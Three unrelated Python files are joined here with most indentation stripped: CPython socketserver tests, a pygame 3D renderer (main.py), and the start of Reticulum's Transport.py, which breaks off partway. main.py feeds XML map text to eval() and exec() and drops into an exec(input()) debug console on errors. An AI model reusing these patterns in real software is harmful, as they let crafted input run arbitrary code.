HAVE_UNIX_SOCKETS = hasattr(socket, "AF_UNIX")
requires_unix_sockets = unittest.skipUnless(HAVE_UNIX_SOCKETS,
'requires Unix sockets')
HAVE_FORKING = test.support.has_fork_support
requires_forking = unittest.skipUnless(HAVE_FORKING, 'requires forking')
def signal_alarm(n):
"""Call signal.alarm when it exists (i.e. not on Windows)."""
if hasattr(signal, 'alarm'):
signal.alarm(n)
# Remember real select() to avoid interferences with mocking
_real_select = select.select
def receive(sock, n, timeout=test.support.SHORT_TIMEOUT):
r, w, x = _real_select([sock], [], [], timeout)
if sock in r:
return sock.recv(n)
else:
raise RuntimeError("timed out on %r" % (sock,))
if HAVE_UNIX_SOCKETS and HAVE_FORKING:
class ForkingUnixStreamServer(socketserver.ForkingMixIn,
socketserver.UnixStreamServer):
pass
class ForkingUnixDatagramServer(socketserver.ForkingMixIn,
socketserver.UnixDatagramServer):
pass
@contextlib.contextmanager
def simple_subprocess(testcase):
"""Tests that a custom child process is not waited on (Issue 1540386)"""
pid = os.fork()
if pid == 0:
# Don't raise an exception; it would be caught by the test harness.
os._exit(72)
try:
yield None
except:
raise
finally:
test.support.wait_process(pid, exitcode=72)
class SocketServerTest(unittest.TestCase):
"""Test all socket servers."""
def setUp(self):
signal_alarm(60) # Kill deadlocks after 60 seconds.
self.port_seed = 0
self.test_files = []
def tearDown(self):
signal_alarm(0) # Didn't deadlock.
reap_children()
for fn in self.test_files:
try:
os.remove(fn)
except OSError:
pass
self.test_files[:] = []
def pickaddr(self, proto):
if proto == socket.AF_INET:
return (HOST, 0)
else:
# XXX: We need a way to tell AF_UNIX to pick its own name
# like AF_INET provides port==0.
dir = None
fn = tempfile.mktemp(prefix='unix_socket.', dir=dir)
self.test_files.append(fn)
return fn
def make_server(self, addr, svrcls, hdlrbase):
class MyServer(svrcls):
def handle_error(self, request, client_address):
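                # Re-raise instead of swallowing, so handler bugs fail the test.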
self.close_request(request)
raise
class MyHandler(hdlrbase):
def handle(self):
line = self.rfile.readline()
self.wfile.write(line)
if verbose: print("creating server")
try:
server = MyServer(addr, MyHandler)
except PermissionError as e:
# Issue 29184: cannot bind() a Unix socket on Android.
self.skipTest('Cannot create server (%s, %s): %s' %
(svrcls, addr, e))
self.assertEqual(server.server_address, server.socket.getsockname())
return server
@threading_helper.reap_threads
def run_server(self, svrcls, hdlrbase, testfunc):
server = self.make_server(self.pickaddr(svrcls.address_family),
svrcls, hdlrbase)
# We had the OS pick a port, so pull the real address out of
# the server.
addr = server.server_address
if verbose:
print("ADDR =", addr)
print("CLASS =", svrcls)
t = threading.Thread(
name='%s serving' % svrcls,
target=server.serve_forever,
# Short poll interval to make the test finish quickly.
# Time between requests is short enough that we won't wake
# up spuriously too many times.
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
t.start()
if verbose: print("server running")
for i in range(3):
if verbose: print("test client", i)
testfunc(svrcls.address_family, addr)
if verbose: print("waiting for server")
server.shutdown()
t.join()
server.server_close()
self.assertEqual(-1, server.socket.fileno())
if HAVE_FORKING and isinstance(server, socketserver.ForkingMixIn):
# bpo-31151: Check that ForkingMixIn.server_close() waits until
# all children completed
self.assertFalse(server.active_children)
if verbose: print("done")
def stream_examine(self, proto, addr):
with socket.socket(proto, socket.SOCK_STREAM) as s:
s.connect(addr)
s.sendall(TEST_STR)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
def dgram_examine(self, proto, addr):
with socket.socket(proto, socket.SOCK_DGRAM) as s:
if HAVE_UNIX_SOCKETS and proto == socket.AF_UNIX:
s.bind(self.pickaddr(proto))
s.sendto(TEST_STR, addr)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
def test_TCPServer(self):
self.run_server(socketserver.TCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_ThreadingTCPServer(self):
self.run_server(socketserver.ThreadingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_forking
def test_ForkingTCPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_UnixStreamServer(self):
self.run_server(socketserver.UnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_ThreadingUnixStreamServer(self):
self.run_server(socketserver.ThreadingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixStreamServer(self):
with simple_subprocess(self):
self.run_server(ForkingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_UDPServer(self):
self.run_server(socketserver.UDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
def test_ThreadingUDPServer(self):
self.run_server(socketserver.ThreadingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_forking
def test_ForkingUDPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_UnixDatagramServer(self):
self.run_server(socketserver.UnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_ThreadingUnixDatagramServer(self):
self.run_server(socketserver.ThreadingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixDatagramServer(self):
self.run_server(ForkingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@threading_helper.reap_threads
def test_shutdown(self):
# Issue #2302: shutdown() should always succeed in making an
# other thread leave serve_forever().
class MyServer(socketserver.TCPServer):
pass
class MyHandler(socketserver.StreamRequestHandler):
pass
threads = []
for i in range(20):
s = MyServer((HOST, 0), MyHandler)
t = threading.Thread(
name='MyServer serving',
target=s.serve_forever,
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
threads.append((t, s))
for t, s in threads:
t.start()
s.shutdown()
for t, s in threads:
t.join()
s.server_close()
def test_close_immediately(self):
class MyServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
server = MyServer((HOST, 0), lambda: None)
server.server_close()
def test_tcpserver_bind_leak(self):
# Issue #22435: the server socket wouldn't be closed if bind()/listen()
# failed.
        # Create many servers for which bind() will fail, to see if this results
# in FD exhaustion.
for i in range(1024):
with self.assertRaises(OverflowError):
socketserver.TCPServer((HOST, -1),
socketserver.StreamRequestHandler)
def test_context_manager(self):
with socketserver.TCPServer((HOST, 0),
socketserver.StreamRequestHandler) as server:
pass
self.assertEqual(-1, server.socket.fileno())
class ErrorHandlerTest(unittest.TestCase):
"""Test that the servers pass normal exceptions from the handler to
handle_error(), and that exiting exceptions like SystemExit and
KeyboardInterrupt are not passed."""
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_sync_handled(self):
BaseErrorTestServer(ValueError)
self.check_result(handled=True)
def test_sync_not_handled(self):
with self.assertRaises(SystemExit):
BaseErrorTestServer(SystemExit)
self.check_result(handled=False)
def test_threading_handled(self):
ThreadingErrorTestServer(ValueError)
self.check_result(handled=True)
def test_threading_not_handled(self):
with threading_helper.catch_threading_exception() as cm:
ThreadingErrorTestServer(SystemExit)
self.check_result(handled=False)
self.assertIs(cm.exc_type, SystemExit)
@requires_forking
def test_forking_handled(self):
ForkingErrorTestServer(ValueError)
self.check_result(handled=True)
@requires_forking
def test_forking_not_handled(self):
ForkingErrorTestServer(SystemExit)
self.check_result(handled=False)
def check_result(self, handled):
with open(os_helper.TESTFN) as log:
expected = 'Handler called\n' + 'Error handled\n' * handled
self.assertEqual(log.read(), expected)
class BaseErrorTestServer(socketserver.TCPServer):
def __init__(self, exception):
self.exception = exception
super().__init__((HOST, 0), BadHandler)
with socket.create_connection(self.server_address):
pass
try:
self.handle_request()
finally:
self.server_close()
self.wait_done()
def handle_error(self, request, client_address):
with open(os_helper.TESTFN, 'a') as log:
log.write('Error handled\n')
def wait_done(self):
pass
class BadHandler(socketserver.BaseRequestHandler):
def handle(self):
with open(os_helper.TESTFN, 'a') as log:
log.write('Handler called\n')
raise self.server.exception('Test error')
class ThreadingErrorTestServer(socketserver.ThreadingMixIn,
BaseErrorTestServer):
def __init__(self, *pos, **kw):
self.done = threading.Event()
super().__init__(*pos, **kw)
def shutdown_request(self, *pos, **kw):
super().shutdown_request(*pos, **kw)
self.done.set()
def wait_done(self):
self.done.wait()
if HAVE_FORKING:
class ForkingErrorTestServer(socketserver.ForkingMixIn, BaseErrorTestServer):
pass
class SocketWriterTest(unittest.TestCase):
def test_basics(self):
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.wfile = self.wfile
self.server.wfile_fileno = self.wfile.fileno()
self.server.request_fileno = self.request.fileno()
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
s = socket.socket(
server.address_family, socket.SOCK_STREAM, socket.IPPROTO_TCP)
with s:
s.connect(server.server_address)
server.handle_request()
self.assertIsInstance(server.wfile, io.BufferedIOBase)
self.assertEqual(server.wfile_fileno, server.request_fileno)
def test_write(self):
# Test that wfile.write() sends data immediately, and that it does
# not truncate sends when interrupted by a Unix signal
pthread_kill = test.support.get_attribute(signal, 'pthread_kill')
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.sent1 = self.wfile.write(b'write data\n')
# Should be sent immediately, without requiring flush()
self.server.received = self.rfile.readline()
big_chunk = b'\0' * test.support.SOCK_MAX_SIZE
self.server.sent2 = self.wfile.write(big_chunk)
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
interrupted = threading.Event()
def signal_handler(signum, frame):
interrupted.set()
original = signal.signal(signal.SIGUSR1, signal_handler)
self.addCleanup(signal.signal, signal.SIGUSR1, original)
response1 = None
received2 = None
main_thread = threading.get_ident()
def run_client():
s = socket.socket(server.address_family, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
with s, s.makefile('rb') as reader:
s.connect(server.server_address)
nonlocal response1
response1 = reader.readline()
s.sendall(b'client response\n')
reader.read(100)
# The main thread should now be blocking in a send() syscall.
# But in theory, it could get interrupted by other signals,
# and then retried. So keep sending the signal in a loop, in
# case an earlier signal happens to be delivered at an
# inconvenient moment.
while True:
pthread_kill(main_thread, signal.SIGUSR1)
if interrupted.wait(timeout=float(1)):
break
nonlocal received2
received2 = len(reader.read())
background = threading.Thread(target=run_client)
background.start()
server.handle_request()
background.join()
self.assertEqual(server.sent1, len(response1))
self.assertEqual(response1, b'write data\n')
self.assertEqual(server.received, b'client response\n')
self.assertEqual(server.sent2, test.support.SOCK_MAX_SIZE)
self.assertEqual(received2, test.support.SOCK_MAX_SIZE - 100)
class MiscTestCase(unittest.TestCase):
def test_all(self):
# objects defined in the module should be in __all__
expected = []
for name in dir(socketserver):
if not name.startswith('_'):
mod_object = getattr(socketserver, name)
if getattr(mod_object, '__module__', None) == 'socketserver':
expected.append(name)
self.assertCountEqual(socketserver.__all__, expected)
def test_shutdown_request_called_if_verify_request_false(self):
# Issue #26309: BaseServer should call shutdown_request even if
# verify_request is False
class MyServer(socketserver.TCPServer):
def verify_request(self, request, client_address):
return False
shutdown_called = 0
def shutdown_request(self, request):
self.shutdown_called += 1
socketserver.TCPServer.shutdown_request(self, request)
server = MyServer((HOST, 0), socketserver.StreamRequestHandler)
s = socket.socket(server.address_family, socket.SOCK_STREAM)
s.connect(server.server_address)
s.close()
server.handle_request()
self.assertEqual(server.shutdown_called, 1)
server.server_close()
def test_threads_reaped(self):
"""
In #37193, users reported a memory leak
due to the saving of every request thread. Ensure that
not all threads are kept forever.
"""
class MyServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
server = MyServer((HOST, 0), socketserver.StreamRequestHandler)
for n in range(10):
with socket.create_connection(server.server_address):
server.handle_request()
self.assertLess(len(server._threads), 10)
server.server_close()
if __name__ == "__main__":
unittest.main()
|
main.py
|
import sys, pygame, math, time, numpy, re
from multiprocessing import Process  # used by cthread below
from hashlib import sha1
import xml.etree.ElementTree as ET
pygame.init()
pygame.font.init()
def cthread(func,args):
t = Process(target = func, args = args)
t.start()
def calculate_circle_points(x, y, r):
    # Sample the circle centred on (x, y) at integer x-offsets, taking the
    # pair of y values from the circle equation (x-h)^2 + (y-k)^2 = r^2.
    points = []
    for i in range(-r, r + 1):
        s = math.sqrt(max(r**2 - i**2, 0))
        points.append([x + i, y + s])
        if s != 0:
            points.append([x + i, y - s])
    return points
#drawing
def draw_point(point):
try:
screen.blit(hash, (round(point[0] + width / 2), round(point[1] + height / 2)))
except TypeError:
pass
def calculate_2d_point(point, camera = [0,0,0], f = 1000): # perspective-project a 3D point onto the screen plane
try:
if point[2] - camera[2] >= 0:
x = ((point[0] - camera[0]) * (f / (point[2] - camera[2]))) + camera[0]
y = ((point[1] - camera[1]) * (f / (point[2] - camera[2]))) + camera[1]
else:
x = -10000
y = -10000
except ZeroDivisionError: #TODO: fix this lmao
x = -10000
y = -10000
return x, y
def compute_rotate(r,p,y):
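    # Build the combined rotation matrix R = Rz(yaw) * Ry(pitch) * Rx(roll)
    # and return its nine entries in row-major order
    # (Axx Axy Axz / Ayx Ayy Ayz / Azx Azy Azz).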
cosa = math.cos(y)
sina = math.sin(y)
cosb = math.cos(p)
sinb = math.sin(p)
cosc = math.cos(r)
sinc = math.sin(r)
Axx = cosa*cosb
Axy = cosa*sinb*sinc - sina*cosc
Axz = cosa*sinb*cosc + sina*sinc
Ayx = sina*cosb
Ayy = sina*sinb*sinc + cosa*cosc
Ayz = sina*sinb*cosc - cosa*sinc
Azx = -sinb
Azy = cosb*sinc
Azz = cosb*cosc
return (Axx, Axy, Axz, Ayx, Ayy, Ayz, Azx, Azy, Azz)
def rotate_point(point,origin, r_vars):
Axx, Axy, Axz, Ayx, Ayy, Ayz, Azx, Azy, Azz = r_vars
res = []
px = point[0]
py = point[1]
pz = point[2]
#transform to origin
px -= origin[0]
py -= origin[1]
pz -= origin[2]
#rotate
res = [Axx*px + Axy*py + Axz*pz,Ayx*px + Ayy*py + Ayz*pz,Azx*px + Azy*py + Azz*pz]
#transform back
res[0] += origin[0]
res[1] += origin[1]
res[2] += origin[2]
return res
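# A minimal, hypothetical sanity check for the two helpers above (not part
# of the original program and never called by it): a quarter-turn yaw about
# the origin should map the +x axis onto the +y axis.
def _example_rotate_point():
    r_vars = compute_rotate(0, 0, math.pi / 2)
    x, y, z = rotate_point([1, 0, 0], [0, 0, 0], r_vars)
    assert abs(x) < 1e-9 and abs(y - 1.0) < 1e-9 and abs(z) < 1e-9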
def full_process_point(point, rorigin,r_vars,c_vars): #Compute rotate first!
global camera
point = rotate_point(point,rorigin,r_vars)
point = rotate_point(point,camera,c_vars)
point = calculate_2d_point(point, camera)
return point
#draw_point(point)
def calculate_cube(x, y, z, x1, y1, z1, pitch, roll, yaw):
it_x = x1 - x
it_y = y1 - y
it_z = z1 - z
mid_x = (x1 + x) / 2
mid_y = (y1 + y) / 2
mid_z = (z1 + z) / 2
mid = [mid_x, mid_y, mid_z]
r_vars = compute_rotate(pitch, roll, yaw) #Prepare rotation
c_vars = compute_rotate(camera_facing[1] * math.pi/180,camera_facing[0] * math.pi/180,0) #Prepare camera rotation
points = []
for ix in range(x, x1+1):
for iz in range(z, z1+1):
points.append([ix,y,iz])
points.append([ix,y1,iz])
for iz in range(z, z1+1):
for iy in range(y, y1+1):
points.append([x,iy,iz])
points.append([x1,iy,iz])
for ix in range(x, x1+1):
for iy in range(y, y1+1):
points.append([ix,iy,z])
points.append([ix,iy,z1])
for i in range(len(points)):
points[i] = full_process_point(points[i],mid,r_vars,c_vars)
return points
def calculate_sphere(x, y, z, r, pitch, roll, yaw):
    #TODO: Improve algo
    #Algo right now ->
    # Calculate circles sequentially
r_vars = compute_rotate(pitch, roll, yaw) #Prepare rotation
c_vars = compute_rotate(camera_facing[1] * math.pi/180,camera_facing[0] * math.pi/180,0) #Prepare camera rotation
points = []
for ir in range(-r,r+1):
p = calculate_circle_points(0, 0, round(math.sqrt(r**2 - ir**2)))
for point in p:
points.append([point[0]+x, point[1]+y, z + ir])
points.append([point[0]+x, y+ir, z + point[1]])
for i in range(len(points)):
points[i] = full_process_point(points[i],[x,y,z],r_vars,c_vars)
return points
def calculate_pyramid():
pass
def read_map_xml(filename): # {id:[objecttype,calculatedhash,[params],points,isanimated,anim]}
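    # NOTE: attribute values tagged 'eval'/'rel' and the 'animate' blocks are
    # passed straight to eval()/exec(), so map files are trusted code.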
result = {}
portals = {}
rel_objects = {}
file = open(filename,'r')
data = file.read()
file.close()
root = ET.fromstring(data)
for child1 in root:
if child1.tag == 'objects':
for child2 in child1:
if child2.attrib['id'] == 'auto':
child2.attrib['id'] = str(int(list(rel_objects.keys())[-1]) + 1)
if child2.tag == 'cube':
params = {}
object_variables[child2.attrib['id']] = {}
for attrib in child2:
if attrib.attrib['type'] == 'eval':
params[attrib.tag] = eval(attrib.text)
elif attrib.attrib['type'] == 'str':
params[attrib.tag] = attrib.text
elif attrib.attrib['type'] == 'rel':
parse = attrib.text
data = re.findall(r'{.*}\[\w*\]',parse)
for d in data:
rel_id = d.replace('{','').replace('}',' ').replace('[','').replace(']','').split(' ')
if rel_id[0].startswith('self'):
rel_id[0] = eval(rel_id[0].replace('self',child2.attrib['id']))
parse = parse.replace(d, str(rel_objects[str(rel_id[0])][str(rel_id[1])]))
params[attrib.tag] = eval(parse)
else:
params[attrib.tag] = eval('{}({})'.format(attrib.attrib['type'],attrib.text))
if 'animate' in params:
isanimated = True
id = child2.attrib['id']
anim = params['animate']
exec(params['animate_init'])
else:
isanimated = False
anim = ''
funcparams = [params['x'],params['y'],params['z'],params['x1'],params['y1'],params['z1'],params['pitch'],params['roll'],params['yaw']]
rel_objects[child2.attrib['id']] = params
result[child2.attrib['id']] = ['cube',None,funcparams,[],isanimated,anim]
if child2.tag == 'sphere':
params = {}
object_variables[child2.attrib['id']] = {}
for attrib in child2:
if attrib.attrib['type'] == 'eval':
params[attrib.tag] = eval(attrib.text)
elif attrib.attrib['type'] == 'str':
params[attrib.tag] = attrib.text
elif attrib.attrib['type'] == 'rel':
parse = attrib.text
data = re.findall(r'{.*}\[\w*\]',parse)
for d in data:
rel_id = d.replace('{','').replace('}',' ').replace('[','').replace(']','').split(' ')
if rel_id[0].startswith('self'):
rel_id[0] = eval(rel_id[0].replace('self',child2.attrib['id']))
parse = parse.replace(d, str(rel_objects[str(rel_id[0])][str(rel_id[1])]))
params[attrib.tag] = eval(parse)
else:
params[attrib.tag] = eval('{}({})'.format(attrib.attrib['type'],attrib.text))
if 'animate' in params:
isanimated = True
id = child2.attrib['id']
anim = params['animate']
exec(params['animate_init'])
else:
isanimated = False
anim = ''
funcparams = [params['x'],params['y'],params['z'],params['r'],params['pitch'],params['roll'],params['yaw']]
result[child2.attrib['id']] = ['sphere',None,funcparams,[],isanimated,anim]
elif child1.tag == 'misc':
for child2 in child1:
if child2.tag == 'portal':
if child2.attrib['id'] not in portals:
portals[child2.attrib['id']] = []
params = {}
for attrib in child2:
if attrib.attrib['type'] == 'eval':
params[attrib.tag] = eval(attrib.text)
elif attrib.attrib['type'] == 'str':
params[attrib.tag] = attrib.text
elif attrib.attrib['type'] == 'rel':
parse = attrib.text
data = re.findall(r'{.*}\[\w*\]',parse)
for d in data:
rel_id = d.replace('{','').replace('}',' ').replace('[','').replace(']','').split(' ')
if rel_id[0].startswith('self'):
rel_id[0] = eval(rel_id[0].replace('self',child2.attrib['id']))
parse = parse.replace(d, str(rel_objects[str(rel_id[0])][str(rel_id[1])]))
params[attrib.tag] = eval(parse)
else:
params[attrib.tag] = eval('{}({})'.format(attrib.attrib['type'],attrib.text))
portals[child2.attrib['id']].append(params)
return result, portals
def get_calculate_hash():
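    # Fingerprint the current camera pose; objects re-project their cached
    # points only when this hash changes (i.e. the camera moved or turned).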
global camera, camera_facing
res = ''
for x in camera:
res += str(x)
for x in camera_facing:
res += str(x)
return sha1(res.encode('utf-8')).hexdigest()
def process_all_points(data):
for point in data:
draw_point(point)
def main():
global object_variables
black = 0, 0, 0
size = width, height = 1000,700
screen = pygame.display.set_mode(size)
    hash = pygame.image.load("#.png") # NOTE: shadows the built-in hash()
menu_img = pygame.image.load("menu.png")
clock = pygame.time.Clock()
camera = [0,0,0]
camera_facing = [0, 0] #lr ud
r = 0
myfont = pygame.font.SysFont('Lucida', 20)
posa = [0,0,0,30,30,0]
object_variables = {}
objects, portals = read_map_xml('map.xml')
    c = 90 # 90 degree offset: W/S move along facing+90, A/D strafe along facing
menu = False
settings = {'updown':False}
yes = (0, 255, 0)
no = (255, 0, 0)
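    # Promote all of main()'s locals (screen, camera, hash, ...) to module
    # globals so the helper functions defined above can reach them.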
globals().update(locals())
while True:
dt = clock.tick(100)
print('x: {} y: {} z: {} alpha: {}'.format(round(camera[0]),round(camera[1]),round(camera[2]),round(camera_facing[0])),end = ' \r')
textsurface = myfont.render('FPS: ' + str(round(clock.get_fps(),1)), False, (255, 0, 0))
for event in pygame.event.get():
if event.type == pygame.QUIT: sys.exit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE: menu = not menu
keys=pygame.key.get_pressed()
if keys[pygame.K_w]:
camera[2] += 2 * math.sin((camera_facing[0] + c) * math.pi/180) * dt / 50
camera[0] += 2 * math.cos((camera_facing[0] + c) * math.pi/180) * dt / 50
if keys[pygame.K_a]:
camera[2] -= 2 * math.sin((camera_facing[0]) * math.pi/180) * dt / 50
camera[0] -= 2 * math.cos((camera_facing[0]) * math.pi/180) * dt / 50
if keys[pygame.K_s]:
camera[2] -= 2 * math.sin((camera_facing[0] + c) * math.pi/180) * dt / 50
camera[0] -= 2 * math.cos((camera_facing[0] + c) * math.pi/180) * dt / 50
if keys[pygame.K_d]:
camera[2] += 2 * math.sin((camera_facing[0]) * math.pi/180) * dt / 50
camera[0] += 2 * math.cos((camera_facing[0]) * math.pi/180) * dt / 50
if keys[pygame.K_LSHIFT]:
camera[1] += 2 * dt / 50
if keys[pygame.K_SPACE]:
camera[1] -= 2 * dt / 50
if settings['updown']:
if keys[pygame.K_UP]:
camera_facing[1] += 2 * dt / 50
if keys[pygame.K_DOWN]:
camera_facing[1] -= 2 * dt / 50
if keys[pygame.K_LEFT]:
camera_facing[0] += 2 * dt / 50
if keys[pygame.K_RIGHT]:
camera_facing[0] -= 2 * dt / 50
screen.fill(black)
if not menu:
for id in objects.keys():
if objects[id][0] == 'cube':
if objects[id][1] != get_calculate_hash() or objects[id][4]:
objects[id][1] = get_calculate_hash()
if objects[id][4]:
exec(objects[id][5])
objects[id][3] = calculate_cube(objects[id][2][0],objects[id][2][1],objects[id][2][2],objects[id][2][3],objects[id][2][4],objects[id][2][5],objects[id][2][6],objects[id][2][7],objects[id][2][8])
process_all_points(objects[id][3])
if objects[id][0] == 'sphere':
if objects[id][1] != get_calculate_hash() or objects[id][4]:
objects[id][1] = get_calculate_hash()
if objects[id][4]:
exec(objects[id][5])
objects[id][3] = calculate_sphere(objects[id][2][0],objects[id][2][1],objects[id][2][2],objects[id][2][3],objects[id][2][4],objects[id][2][5],objects[id][2][6])
process_all_points(objects[id][3])
else:
if settings['updown']:
udoption = myfont.render('Updown camera rotation', False, yes)
else:
udoption = myfont.render('Updown camera rotation', False, no)
screen.blit(menu_img,(0,0))
screen.blit(udoption,(10,10))
b1,b2,b3 = pygame.mouse.get_pressed()
if b1 == 1:
if pygame.Rect(2,2,198,58).collidepoint(pygame.mouse.get_pos()):
settings['updown'] = not settings['updown']
camera_facing[1] = 0
menu = False
screen.blit(textsurface,(0,0))
pygame.display.flip()
try:
main()
except Exception as e:
    print('{}: {}'.format(type(e).__name__, e))
print('starting debug console')
while True:
exec(input('>>>'))
|
Transport.py
|
import os
import RNS
import time
import math
import struct
import threading
import traceback
from time import sleep
from .vendor import umsgpack as umsgpack
class Transport:
"""
    Through static methods of this class you can interact with Reticulum's
Transport system.
"""
# Constants
    BROADCAST = 0x00
    TRANSPORT = 0x01
    RELAY     = 0x02
    TUNNEL    = 0x03
types = [BROADCAST, TRANSPORT, RELAY, TUNNEL]
REACHABILITY_UNREACHABLE = 0x00
REACHABILITY_DIRECT = 0x01
REACHABILITY_TRANSPORT = 0x02
APP_NAME = "rnstransport"
PATHFINDER_M = 128 # Max hops
"""
Maximum amount of hops that Reticulum will transport a packet.
"""
PATHFINDER_C = 2.0 # Decay constant
PATHFINDER_R = 1 # Retransmit retries
PATHFINDER_T = 10 # Retry grace period
PATHFINDER_RW = 10 # Random window for announce rebroadcast
PATHFINDER_E = 60*15 # Path expiration in seconds
# TODO: Calculate an optimal number for this in
# various situations
LOCAL_REBROADCASTS_MAX = 2 # How many local rebroadcasts of an announce is allowed
PATH_REQUEST_GRACE = 0.35 # Grace time before a path announcement is made, allows directly reachable peers to respond first
PATH_REQUEST_RW = 2 # Path request random window
LINK_TIMEOUT = RNS.Link.KEEPALIVE * 2
REVERSE_TIMEOUT = 30*60 # Reverse table entries are removed after max 30 minutes
DESTINATION_TIMEOUT = 60*60*24*7 # Destination table entries are removed if unused for one week
MAX_RECEIPTS = 1024 # Maximum number of receipts to keep track of
interfaces = [] # All active interfaces
destinations = [] # All active destinations
pending_links = [] # Links that are being established
active_links = [] # Links that are active
packet_hashlist = [] # A list of packet hashes for duplicate detection
receipts = [] # Receipts of all outgoing packets for proof processing
# TODO: "destination_table" should really be renamed to "path_table"
# Notes on memory usage: 1 megabyte of memory can store approximately
    # 55,100 path table entries or approximately 22,300 link table entries.
announce_table = {} # A table for storing announces currently waiting to be retransmitted
destination_table = {} # A lookup table containing the next hop to a given destination
reverse_table = {} # A lookup table for storing packet hashes used to return proofs and replies
link_table = {} # A lookup table containing hops for links
held_announces = {} # A table containing temporarily held announce-table entries
announce_handlers = [] # A table storing externally registered announce handlers
# Transport control destinations are used
# for control purposes like path requests
control_destinations = []
control_hashes = []
# Interfaces for communicating with
# local clients connected to a shared
# Reticulum instance
local_client_interfaces = []
jobs_locked = False
jobs_running = False
job_interval = 0.250
receipts_last_checked = 0.0
receipts_check_interval = 1.0
announces_last_checked = 0.0
announces_check_interval = 1.0
hashlist_maxsize = 1000000
tables_last_culled = 0.0
tables_cull_interval = 5.0
identity = None
@staticmethod
def start(reticulum_instance):
Transport.owner = reticulum_instance
if Transport.identity == None:
transport_identity_path = RNS.Reticulum.storagepath+"/transport_identity"
if os.path.isfile(transport_identity_path):
Transport.identity = RNS.Identity.from_file(transport_identity_path)
if Transport.identity == None:
RNS.log("No valid Transport Identity in storage, creating...", RNS.LOG_VERBOSE)
Transport.identity = RNS.Identity()
Transport.identity.to_file(transport_identity_path)
else:
RNS.log("Loaded Transport Identity from storage", RNS.LOG_VERBOSE)
packet_hashlist_path = RNS.Reticulum.storagepath+"/packet_hashlist"
if os.path.isfile(packet_hashlist_path):
try:
file = open(packet_hashlist_path, "rb")
Transport.packet_hashlist = umsgpack.unpackb(file.read())
file.close()
except Exception as e:
RNS.log("Could not load packet hashlist from storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
# Create transport-specific destinations
Transport.path_request_destination = RNS.Destination(None, RNS.Destination.IN, RNS.Destination.PLAIN, Transport.APP_NAME, "path", "request")
Transport.path_request_destination.set_packet_callback(Transport.path_request_handler)
Transport.control_destinations.append(Transport.path_request_destination)
Transport.control_hashes.append(Transport.path_request_destination.hash)
thread = threading.Thread(target=Transport.jobloop)
        thread.daemon = True
thread.start()
if RNS.Reticulum.transport_enabled():
destination_table_path = RNS.Reticulum.storagepath+"/destination_table"
if os.path.isfile(destination_table_path) and not Transport.owner.is_connected_to_shared_instance:
serialised_destinations = []
try:
file = open(destination_table_path, "rb")
serialised_destinations = umsgpack.unpackb(file.read())
file.close()
for serialised_entry in serialised_destinations:
destination_hash = serialised_entry[0]
timestamp = serialised_entry[1]
received_from = serialised_entry[2]
hops = serialised_entry[3]
expires = serialised_entry[4]
random_blobs = serialised_entry[5]
receiving_interface = Transport.find_interface_from_hash(serialised_entry[6])
announce_packet = Transport.get_cached_packet(serialised_entry[7])
if announce_packet != None and receiving_interface != None:
announce_packet.unpack()
# We increase the hops, since reading a packet
# from cache is equivalent to receiving it again
                            # over an interface. It is cached with its non-
                            # increased hop-count.
announce_packet.hops += 1
Transport.destination_table[destination_hash] = [timestamp, received_from, hops, expires, random_blobs, receiving_interface, announce_packet]
RNS.log("Loaded path table entry for "+RNS.prettyhexrep(destination_hash)+" from storage", RNS.LOG_DEBUG)
else:
RNS.log("Could not reconstruct path table entry from storage for "+RNS.prettyhexrep(destination_hash), RNS.LOG_DEBUG)
if announce_packet == None:
RNS.log("The announce packet could not be loaded from cache", RNS.LOG_DEBUG)
if receiving_interface == None:
RNS.log("The interface is no longer available", RNS.LOG_DEBUG)
if len(Transport.destination_table) == 1:
specifier = "entry"
else:
specifier = "entries"
RNS.log("Loaded "+str(len(Transport.destination_table))+" path table "+specifier+" from storage", RNS.LOG_VERBOSE)
except Exception as e:
RNS.log("Could not load destination table from storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
RNS.log("Transport instance "+str(Transport.identity)+" started")
@staticmethod
def jobloop():
        while True:
Transport.jobs()
sleep(Transport.job_interval)
@staticmethod
def jobs():
outgoing = []
Transport.jobs_running = True
try:
if not Transport.jobs_locked:
# Process receipts list for timed-out packets
if time.time() > Transport.receipts_last_checked+Transport.receipts_check_interval:
while len(Transport.receipts) > Transport.MAX_RECEIPTS:
culled_receipt = Transport.receipts.pop(0)
culled_receipt.timeout = -1
culled_receipt.check_timeout()
for receipt in Transport.receipts:
receipt.check_timeout()
if receipt.status != RNS.PacketReceipt.SENT:
Transport.receipts.remove(receipt)
